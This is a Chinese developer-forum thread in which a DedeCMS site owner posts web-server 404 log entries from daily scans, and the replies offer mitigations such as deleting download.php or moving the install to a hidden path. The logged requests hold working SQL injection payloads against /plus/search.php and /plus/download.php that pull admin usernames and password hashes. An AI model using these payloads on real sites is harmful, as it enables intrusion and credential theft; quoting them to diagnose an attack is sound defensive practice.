开发者社区 问答 正文

DEDE天天有扫描

404 11:18:14: /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arr
404 11:18:20: /plus/mytag_js.php?aid=9013
404 11:18:26: /plus/search.php?keyword=as&typeArr[111=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,CONCAT(0x40,userid,0x7c,substring(pwd,4,16),0x40),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,CONCAT(0x40,userid,0x7c,substring(pwd,4,16),0x40),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `#@__admin`#@`\'` ]=a
404 11:18:26: /plus/search.php?keyword=as&typeArr[111=@`\'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x40,userid,0x7c,substring(pwd,4,16)) from `#@__admin` limit 78118760,1),1,62)))a from information_schema.tables group by a)b)#@`\'` ]=a

展开
收起
云代维 2013-12-21 17:52:42 22242 分享 版权
7 条回答
写回答
取消 提交回答
  • 我也是DEDE,同楼主一样,愿意接受检验
    2014-07-06 15:01:43
    赞同 展开评论
  • ReDEDE天天有扫描
    我就是用dede的  ~~~~(>_<)~~~~   天天有人烧苗
    2014-07-06 14:57:27
    赞同 展开评论
  • dede算是完了,新手基本很难搞定
    2013-12-22 14:11:57
    赞同 展开评论
  • 最简单的就是不用dede
    2013-12-22 13:38:36
    赞同 展开评论
  • 回 1楼(花木通幽) 的帖子
    把程序安装到隐藏目录不对外公开,比如我签名的站。
    2013-12-21 23:00:46
    赞同 展开评论
  • 回 1楼(花木通幽) 的帖子
    如果没有用到dedecms的下载模块,直接删除掉download.php就行了
    2013-12-21 22:16:48
    赞同 展开评论
  • 回 楼主(服务器之家) 的帖子
    DEDE这个漏洞算是出了名了,我的站这两天天天被光顾,不知道怎么能解决。版主知道了说声啊

    -------------------------

    回 2楼(ap1918w1h) 的帖子
    我偏偏就用了。。。悲催

    -------------------------

    回 3楼(服务器之家) 的帖子
    dede的隐藏不好做吧,我试着隐藏过,不过好难处理文件的路径
    2013-12-21 21:45:59
    赞同 展开评论
滑动查看更多
问答地址: